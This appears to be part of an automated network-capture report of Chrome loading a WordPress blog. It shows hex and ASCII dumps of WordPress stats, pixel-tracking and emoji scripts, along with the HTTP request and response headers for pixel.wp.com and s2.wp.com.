                                                                                                                                                                                                                                                                  Data Ascii: urn decodeURIComponent(o[r].substring(n));return null}},function(t,e,n){"use strict";n.d(e,"a",function(){return T});var o=n(0),r=n.n(o),i=n(1);function a(t){var e=[];if(window.crypto&&window.crypto.getRandomValues)e=new Uint8Array(t),window.crypto.getRan
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 6f 6e 20 74 28 65 2c 6e 29 7b 69 66 28 6e 75 6c 6c 3d 3d 65 7c 7c 22 6f 62 6a 65 63 74 22 21 3d 3d 72 28 29 28 65 29 29 72 65 74 75 72 6e 20 65 3b 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 6e 75 6c 6c 21 3d 6e 26 26 22 6f 62 6a 65 63 74 22 3d 3d 3d 72 28 29 28 6e 29 7c 7c 28 6e 3d 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 29 2c 65 29 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6f 29 26 26 28 6e 5b 6f 5d 3d 74 28 65 5b 6f 5d 29 29 3b 72 65 74 75 72 6e 20 6e 7d 28 6c 2c 74 29 2c 79 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 74 29 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6e 29 26 26 65 2e 70 75 73 68 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6e 29 2b 22 3d 22 2b
                                                                                                                                                                                                                                                                  Data Ascii: on t(e,n){if(null==e||"object"!==r()(e))return e;for(var o in null!=n&&"object"===r()(n)||(n=e.constructor()),e)e.hasOwnProperty(o)&&(n[o]=t(e[o]));return n}(l,t),y(function(t){var e=[];for(var n in t)t.hasOwnProperty(n)&&e.push(encodeURIComponent(n)+"="+
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 3d 22 2b 28 6e 65 77 20 44 61 74 65 29 2e 67 65 74 54 69 6d 65 28 29 2b 22 26 5f 3d 5f 22 2c 6e 2e 61 6c 74 3d 22 22 7d 7d 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 6e 3d 53 28 29 3b 66 6f 72 28 65 3d 30 3b 65 3c 6e 2e 6c 65 6e 67 74 68 3b 2b 2b 65 29 69 66 28 74 3d 3d 6e 5b 65 5d 29 72 65 74 75 72 6e 3b 6e 2e 70 75 73 68 28 74 29 2c 62 28 6e 29 7d 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 3b 74 2e 6a 6f 69 6e 28 22 20 22 29 2e 6c 65 6e 67 74 68 3e 32 30 34 38 3b 29 74 3d 74 2e 73 6c 69 63 65 28 31 29 3b 6b 28 22 71 73 22 2c 74 2e 6a 6f 69 6e 28 22 20 22 29 2c 31 38 30 30 29 7d 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 6e 3d 5b 5d 2c 6f 3d 53 28 29 3b 66 6f 72 28 65 3d 30 3b 65 3c 6f 2e 6c 65 6e 67
                                                                                                                                                                                                                                                                  Data Ascii: ="+(new Date).getTime()+"&_=_",n.alt=""}},g=function(t){var e,n=S();for(e=0;e<n.length;++e)if(t==n[e])return;n.push(t),b(n)},b=function(t){for(;t.join(" ").length>2048;)t=t.slice(1);k("qs",t.join(" "),1800)},_=function(t){var e,n=[],o=S();for(e=0;e<o.leng
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 70 22 2c 65 2e 6a 6f 69 6e 28 22 2c 22 29 29 2c 68 28 7b 5f 65 6e 3a 22 5f 61 6c 69 61 73 55 73 65 72 47 65 6e 65 72 61 6c 22 2c 6e 65 78 74 75 73 65 72 69 64 3a 74 2c 6e 65 78 74 75 73 65 72 69 64 74 79 70 65 3a 22 61 6e 6f 6e 22 2c 70 72 65 76 75 73 65 72 69 64 3a 63 2c 70 72 65 76 75 73 65 72 69 64 74 79 70 65 3a 22 61 6e 6f 6e 22 7d 29 29 7d 6b 28 22 61 69 22 2c 74 29 2c 63 3d 74 2c 75 3d 22 61 6e 6f 6e 22 7d 65 6c 73 65 20 68 28 7b 5f 65 6e 3a 22 5f 61 6c 69 61 73 55 73 65 72 22 2c 61 6e 6f 6e 49 64 3a 74 7d 29 7d 2c 72 65 63 6f 72 64 45 76 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 5f 73 65 74 50 72 6f 70 65 72 74 69 65 73 22 21 3d 3d 74 26 26 28 28 65 3d 65 7c 7c 7b 7d 29 2e 5f 65 6e 3d 74 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79
                                                                                                                                                                                                                                                                  Data Ascii: p",e.join(",")),h({_en:"_aliasUserGeneral",nextuserid:t,nextuseridtype:"anon",prevuserid:c,prevuseridtype:"anon"}))}k("ai",t),c=t,u="anon"}else h({_en:"_aliasUser",anonId:t})},recordEvent:function(t,e,n){"_setProperties"!==t&&((e=e||{})._en=t,"string"==ty
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 74 72 69 6e 67 2e 63 61 6c 6c 28 74 29 2e 73 6c 69 63 65 28 38 2c 2d 31 29 3b 72 65 74 75 72 6e 22 4f 62 6a 65 63 74 22 3d 3d 3d 6e 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 26 26 28 6e 3d 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 6e 61 6d 65 29 2c 22 4d 61 70 22 3d 3d 3d 6e 7c 7c 22 53 65 74 22 3d 3d 3d 6e 3f 41 72 72 61 79 2e 66 72 6f 6d 28 6e 29 3a 22 41 72 67 75 6d 65 6e 74 73 22 3d 3d 3d 6e 7c 7c 2f 5e 28 3f 3a 55 69 7c 49 29 6e 74 28 3f 3a 38 7c 31 36 7c 33 32 29 28 3f 3a 43 6c 61 6d 70 65 64 29 3f 41 72 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 3f 6f 28 74 2c 65 29 3a 76 6f 69 64 20 30 7d 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 28 6e 75 6c 6c 3d 3d 65 7c 7c 65 3e 74
                                                                                                                                                                                                                                                                  Data Ascii: tring.call(t).slice(8,-1);return"Object"===n&&t.constructor&&(n=t.constructor.name),"Map"===n||"Set"===n?Array.from(n):"Arguments"===n||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n)?o(t,e):void 0}}},function(t,e){t.exports=function(t,e){(null==e||e>t
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 61 28 29 28 6e 2e 70 61 72 65 6e 74 4e 6f 64 65 29 29 72 65 74 75 72 6e 3b 6e 3d 6e 2e 70 61 72 65 6e 74 4e 6f 64 65 7d 69 66 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 3b 69 66 28 65 2e 68 6f 73 74 3d 3d 3d 74 2e 68 6f 73 74 29 72 65 74 75 72 6e 21 30 3b 69 66 28 22 22 3d 3d 3d 74 2e 68 6f 73 74 29 72 65 74 75 72 6e 21 30 3b 69 66 28 65 2e 70 72 6f 74 6f 63 6f 6c 3d 3d 3d 74 2e 70 72 6f 74 6f 63 6f 6c 26 26 65 2e 68 6f 73 74 3d 3d 3d 74 2e 68 6f 73 74 6e 61 6d 65 29 7b 69 66 28 22 68 74 74 70 3a 22 3d 3d 3d 65 2e 70 72 6f 74 6f 63 6f 6c 26 26 65 2e 68 6f 73 74 2b 22 3a 38 30 22 3d 3d 3d 74 2e 68 6f 73 74 29 72 65 74 75 72 6e 21 30 3b 69 66 28 22 68 74
                                                                                                                                                                                                                                                                  Data Ascii: f("object"!==a()(n.parentNode))return;n=n.parentNode}if(function(t){var e=document.location;if(e.host===t.host)return!0;if(""===t.host)return!0;if(e.protocol===t.protocol&&e.host===t.hostname){if("http:"===e.protocol&&e.host+":80"===t.host)return!0;if("ht
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 5b 65 5d 29 29 3b 72 65 74 75 72 6e 20 6e 2e 6a 6f 69 6e 28 22 26 22 29 7d 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 6f 3d 6e 65 77 20 49 6d 61 67 65 3b 6f 2e 73 72 63 3d 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 70 69 78 65 6c 2e 77 70 2e 63 6f 6d 2f 22 2b 74 2b 22 3f 22 2b 65 2b 22 26 72 61 6e 64 3d 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2c 6f 2e 61 6c 74 3d 22 22 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 26 26 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 26 26 28 6f 2e 69 64 3d 6e 2c 70 28 6e 29 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 29 7d 2c 70 3d 66 75 6e 63 74
                                                                                                                                                                                                                                                                  Data Ascii: codeURIComponent(t[e]));return n.join("&")},l=function(t,e,n){var o=new Image;o.src=document.location.protocol+"//pixel.wp.com/"+t+"?"+e+"&rand="+Math.random(),o.alt="","string"==typeof n&&document.body&&(o.id=n,p(n),document.body.appendChild(o))},p=funct
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC900INData Raw: 2e 67 69 66 22 2c 66 28 74 29 2c 22 77 70 73 74 61 74 73 22 29 7d 2c 65 78 74 72 61 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 76 3d 22 77 70 63 6f 6d 2d 6e 6f 2d 70 76 22 2c 6c 28 22 67 2e 67 69 66 22 2c 66 28 74 29 2c 21 31 29 7d 2c 72 61 77 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6c 28 22 67 2e 67 69 66 22 2c 66 28 74 29 2c 21 31 29 7d 2c 63 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6c 28 22 63 2e 67 69 66 22 2c 66 28 74 29 2c 21 31 29 7d 2c 63 6c 69 63 6b 54 72 61 63 6b 65 72 49 6e 69 74 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 64 2e 69 6e 69 74 28 74 2c 65 29 7d 7d 2c 79 3d 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 64 6f 63 75 6d 65 6e 74 2e 68 69 64 64 65 6e 7c 7c 28 64 6f 63 75 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74
                                                                                                                                                                                                                                                                  Data Ascii: .gif",f(t),"wpstats")},extra:function(t){t.v="wpcom-no-pv",l("g.gif",f(t),!1)},raw:function(t){l("g.gif",f(t),!1)},click:function(t){l("c.gif",f(t),!1)},clickTrackerInit:function(t,e){d.init(t,e)}},y=function t(){document.hidden||(document.removeEventList


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  23192.168.2.1649735192.0.76.34437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC658OUTGET /g.gif?x_stats-initial-visibility=visible&v=wpcom-no-pv&rand=0.7921517821766884 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: pixel.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://dartergary.wordpress.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC222INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:43 GMT
                                                                                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                                                                                  Content-Length: 50
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC50INData Raw: 47 49 46 38 39 61 06 00 05 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 06 00 05 00 00 02 09 0c 62 78 89 cd 6a 80 0c 05 00 3b
                                                                                                                                                                                                                                                                  Data Ascii: GIF89a!,bxj;


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  24192.168.2.1649738192.0.76.34437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC697OUTGET /g.gif?blog=238502921&v=wpcom&tz=-4&user_id=0&subd=dartergary&host=dartergary.wordpress.com&ref=&rand=0.82970019227276 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: pixel.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://dartergary.wordpress.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC222INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:43 GMT
                                                                                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                                                                                  Content-Length: 50
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC50INData Raw: 47 49 46 38 39 61 06 00 05 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 06 00 05 00 00 02 09 0c 62 78 89 cd 6a 80 0c 05 00 3b
                                                                                                                                                                                                                                                                  Data Ascii: GIF89a!,bxj;


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  25192.168.2.1649736192.0.76.34437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC969OUTGET /g.gif?crypt=UE40eW5QN0p8M2Y%2FRE1mJVY3bm9aR3VCbS9mWm1pRyZuJS1LX1t5QmRXZzE3RC9rQWZHK1FjbDltdWdaMVFFZTcxUGVHLWR0WTJoODFFSDFKMmdBdysuWmJ6fkpUJXxZPVlCQm1qNSxSYkxYZXV0d1ZYLjE1aVdvYUNlcHlGVl0vNXF%2BVEw2QmdPMUg9NjdbdU05bi4%2FZnomWzdTdHwyV3RtM25VTEE0Sm50bFozWEt5VWJ5UDU4Nk1NQ0E1R3A4VityWnxrYS80QUtiWTkuXXc1NnN5RGtkNGpCY2I9TyxuTFNJXW5FWGtVLEMxK0h%2BLndnQnc%3D&v=wpcom-no-pv&rand=0.16543343148914724 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: pixel.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://dartergary.wordpress.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC222INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:43 GMT
                                                                                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                                                                                  Content-Length: 50
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC50INData Raw: 47 49 46 38 39 61 06 00 05 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 06 00 05 00 00 02 09 0c 62 78 89 cd 6a 80 0c 05 00 3b
                                                                                                                                                                                                                                                                  Data Ascii: GIF89a!,bxj;


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  26192.168.2.1649733192.0.77.324437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:43 UTC587OUTGET /wp-includes/js/wp-emoji-release.min.js?m=1719498190i&ver=6.7-RC1-59308 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: s2.wp.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                  Referer: https://dartergary.wordpress.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC505INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:43 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/javascript
                                                                                                                                                                                                                                                                  Content-Length: 18726
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Last-Modified: Thu, 27 Jun 2024 14:23:19 GMT
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  ETag: "667d75d7-4926"
                                                                                                                                                                                                                                                                  Expires: Wed, 29 Oct 2025 11:21:02 GMT
                                                                                                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                  X-ac: 4.dfw _dfw MISS
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  X-nc: HIT dfw 2
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC864INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2f 20 53 6f 75 72 63 65 3a 20 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 74 77 65 6d 6f 6a 69 2e 6d 69 6e 2e 6a 73 0a 76 61 72 20 74 77 65 6d 6f 6a 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3d 7b 62 61 73 65 3a 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 67 68 2f 6a 64 65 63 6b 65 64 2f 74 77 65 6d 6f 6a 69 40 31 35 2e 30 2e 33 2f 61 73 73 65 74 73 2f 22 2c 65 78 74 3a 22 2e 70 6e 67 22 2c 73 69 7a 65 3a 22 37 32 78 37 32 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 65 6d 6f 6a 69 22 2c 63 6f 6e 76 65 72 74 3a 7b 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 3a 66 75 6e 63 74
                                                                                                                                                                                                                                                                  Data Ascii: /*! This file is auto-generated */// Source: wp-includes/js/twemoji.min.jsvar twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:funct
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 26 28 63 3d 63 2e 63 6f 6e 63 61 74 28 22 20 22 2c 66 2c 27 3d 22 27 2c 75 5b 66 5d 2e 72 65 70 6c 61 63 65 28 74 2c 72 29 2c 27 22 27 29 29 3b 63 3d 63 2e 63 6f 6e 63 61 74 28 22 2f 3e 22 29 7d 72 65 74 75 72 6e 20 63 7d 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 64 2c 75 29 7b 76 61 72 20 66 2c 63 2c 65 2c 62 2c 61 2c 74 2c 72 2c 6e 2c 6f 2c 73 2c 69 2c 6c 3d 66 75 6e 63 74 69 6f 6e 20 64 28 75 2c 66 29 7b 76 61 72 20 63 2c 65 2c 62 3d 75 2e 63 68 69 6c 64 4e 6f 64 65 73 2c 61 3d 62 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 3b 61 2d 2d 3b 29 63 3d 62 5b 61 5d 2c 33 3d 3d 3d 28 65 3d 63 2e 6e 6f 64 65 54 79 70 65 29 3f 66 2e 70 75 73 68 28 63 29 3a 31 21 3d 3d 65 7c 7c 22 6f 77 6e 65 72 53 56 47 45 6c 65 6d 65 6e 74 22 69 6e 20 63 7c 7c 6d 2e 74 65 73 74 28 63 2e 6e
                                                                                                                                                                                                                                                                  Data Ascii: &(c=c.concat(" ",f,'="',u[f].replace(t,r),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,r,n,o,s,i,l=function d(u,f){var c,e,b=u.childNodes,a=b.length;for(;a--;)c=b[a],3===(e=c.nodeType)?f.push(c):1!==e||"ownerSVGElement"in c||m.test(c.n
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5c 75 64 66 66 63 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 38 5c 75 64 38 33 63 5c 75 64 66 66 64 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 38 5c
                                                                                                                                                                                                                                                                  Data Ascii: \u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc68\ud83c\udffc\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83d\udc68\ud83c[\udffb-\udfff]|\ud83d\udc68\ud83c\udffd\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83d\udc68\
                                                                                                                                                                                                                                                                  2024-10-29 19:09:44 UTC1369INData Raw: 75 64 66 66 66 5d 7c 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5c 75 64 66 66 66 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 36 39 5c 75 64 38 33 63 5b 5c 75 64 66 66 62 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64 5c 75 64 38 33 64 5c 75 64 63 38 62 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 64 38 33 63 5b 5c 75 64 66 66 63 2d 5c 75 64 66 66 66 5d 7c 5c 75 64 38 33 65 5c 75 64 64 64 31 5c 75 64 38 33 63 5c 75 64 66 66 63 5c 75 32 30 30 64 5c 75 32 37 36 34 5c 75 66 65 30 66 5c 75 32 30 30 64
                                                                                                                                                                                                                                                                  Data Ascii: udfff]|\ud83d\udc69\ud83c\udfff\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83d\udc69\ud83c[\udffb-\udfff]|\ud83e\uddd1\ud83c\udffb\u200d\u2764\ufe0f\u200d\ud83d\udc8b\u200d\ud83e\uddd1\ud83c[\udffc-\udfff]|\ud83e\uddd1\ud83c\udffc\u200d\u2764\ufe0f\u200d
